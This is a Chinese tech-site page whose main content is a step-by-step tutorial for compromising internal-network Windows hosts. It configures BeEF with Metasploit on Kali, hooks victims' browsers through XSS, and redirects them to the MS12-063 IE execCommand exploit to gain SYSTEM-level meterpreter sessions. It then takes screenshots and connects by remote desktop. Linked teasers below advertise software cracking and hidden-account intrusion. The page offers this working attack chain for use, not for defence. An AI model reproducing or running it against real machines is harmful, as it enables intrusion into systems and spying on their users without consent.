怎么用beff+msf工具在kall内网利用xss拿内网主机?
metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用。
系统:KALI
用到的工具:beEF+msf
利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf
MS12-063
AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7
用到的beef+msf
先配置下:
root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
编辑下config.yaml
把metasploit :false改成true
再进入extensions/metasploit/
同样修改下config.yaml
把host跟callback_host 改成自己的IP 这里是220.128
再改动下custom path:
这样beef已经配置好了。那就运行下metasploit
运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass
这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。
进入beef
账号密码beef 配置文件里面有。beef:beef
那beef已经都OK了。
现在来搞下选择下要显示的页面:
hook.js 运行beef 显示出来的。
别忘记运行下apache。
我们再进入msf
use exploit/windows/browser/ie_execcommand_uaf
可以自己根据自己的要求来选择。
show options
port可以自已改。
我用xp+ie7
直接访问下我们的页面192.168.220.128/xss/
beef就会显示出来了。
点击 commands-hookeddomain-REDIRECT BROWSER 让他重新跳转到我们msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)
我们就会看到msf上面已经显示出来了。 回显了sessions
payload可以自己去改。我使用的meterpreter载荷
执行sessions -i
执行sessions -i ID号
可以执行任意命令已经是系统权限
执行下screenshost
meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg
就可以看到当前主机的屏幕内容。
也可以rdesktop 远程连接上去。
参数rdesktop -f ip -u username -p password
这也是一种xss挂马拿内网主机。
注:鄙人每天都在写一些metasploit的玩法,如果有大神有什么好的方法希望告诉我,我更新在空间,分享给大家。
详解arp欺骗 arp欺骗会导致什么问题?
了解ARP地址解析协议我们先来简单描述下什么是ARP,ARP是地址解析协议,ARP协议主要负责将局域网中的32位IP地址转换为对应的48位物理地址,即网卡的MAC地址,比如IP地址为192 168 0 1计算机上网卡的MAC地址为00-0
详情2018-02-13 14:07:14责编:llp 来源:驱动管家如何利用网络访问控制抵御内部和外部攻击?
根据美国特勤局在最近公布的Verizon数据泄漏调查报告中提供的数据显示,内部人员攻击事故的数量在过去一年又翻了一番,但是外部攻击仍然是主要攻击来源,这说明企业仍然没有保护好网络和数据的安全。主动安全控制
详情2018-02-09 17:58:29责编:llp 来源:驱动管家什么是cuteftp?cuteftp 4.0版本怎么破解?
CuteFTP早期的版本的保护还是比较厉害的,先是KeyFile,后来才改成注册码。它有个3 x版本被拿来作为HCU(High Cracking University)的strainer。4 0版本可以变成注册版,但是输入注册码之后它要连到其公司的服
详情2018-01-25 10:56:03责编:llp 来源:驱动管家office漏洞cve-2012-0158的原理和利用方法
下面小编为大家介绍office漏洞CVE-2012-0158就凭借其经典、通用又稳定的漏洞利用经常出现在各种报告中,详细的讲解这个漏洞的原理,以及如何基于原理手动构造出可利用的POC样本。漏洞原理关于本漏洞原理,网上有
详情2018-02-08 18:35:23责编:llp 来源:驱动管家傲游浏览器有哪些漏洞?傲游浏览器的漏洞一般在哪些地方?
这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,1 about:history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。2 遨游的拓展中存在大量
详情2018-01-08 17:11:48责编:llp 来源:驱动管家高强度文件夹加密大师怎么加密解密?
今天我们社团学弟拿了一个高强度文件夹加密大师给社长试试,说是一个这加密文件夹很好的东西,可以把私藏的物品放在文件夹然后加密文件夹。我处于好奇也跟了上去看看。他又说,这是他花了好长时间才找到的一个不
详情2018-01-02 16:45:26责编:llp 来源:驱动管家pe格式文件压缩工具:pecompact 1.8壳分析及多重smc解密方法
目标软件:PECompact软件版本:1 80 Build 2官方网站:http:www CollakeSoftware com 软件授权:共享软件操作系统:Win95 98 ME、WinNT 2000软件简介:知名的PE格式文件压缩工具 软件保护:PECompact壳保护使
详情2018-02-08 08:47:52责编:llp 来源:驱动管家shell.users加用户:一种新的加用户的方法
今天研究了一下用户控制面板文件nusrmgr cpl,发现调用的是Shell Users来加用户,它还同时调用了wscript shell、Shell Application、Shell LocalMachine这三个组件。不过加用户的话,这一个Shell Users就足够了。
详情2018-02-15 09:34:20责编:llp 来源:驱动管家揭秘黑客建立隐藏账号技术 怎么让黑客隐藏的账号无处可藏?
当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。在肉鸡上建立一个隐藏的账户,以备需要的时候使用。账户隐藏技术可谓
详情2018-02-05 11:00:20责编:llp 来源:驱动管家黑客网吧黑人 黑客是怎么入侵网吧管理系统的?
从你这里真是学到不少东西呀,今天我去网吧和同事打了会儿游戏,我从来不在网吧上用QQ,总觉得网吧很危险,里面到全是木马。我知道很多人能够得到MM的QQ号,他们是怎么弄的?网吧上网能安全放心吗?你是不是也经
详情2018-02-08 14:30:03责编:llp 来源:驱动管家
- cad字体样式缺少怎么办?cad怎么填补指定的字体样式?
- 佳能相机镜头缩不回去是怎么回事?如何解决
- 【游戏攻略】《绝地求生大逃杀》压枪技巧教学 如何压枪扫射?
- 在热血无赖的时候出现闪退现象怎么办?
- 遇到电脑蓝屏现象应该怎么解决?电脑蓝屏的原因
- 电脑开机几秒后就自动关机是什么原因?如何解决
- 手机贴膜教程 手机贴膜有哪些要点?
- 酷派8150 root步骤 酷派8150 root注意什么?
- 电脑开机很慢怎么办?如何提高电脑开机速度
- 实用工具sqlcmd使用协议的顺序是什么?怎么确定?
- 隐藏木马启动的几种方法 怎么解决文件关联问题?
- 用ghost版重装系统后找不到显卡 怎么解决
- cad快速看图是什么软件?cad快速看图怎么用?
- 投影镜头是怎样工作的?投影镜头的简介
- 佳能广角镜头有哪些?佳能广角镜头的介绍
- 三星DeX Pad将发布 可当鼠标使用
- 电脑插入u盘之后出现开机蓝屏的原因是什么?怎么解决
- 电脑BIOS是什么意思?BIOS怎么设置
- 小米4s需要哪些贴膜工具?小米4s贴膜流程
- 傲腾内存有哪些性能优势?傲腾内存安装设置详解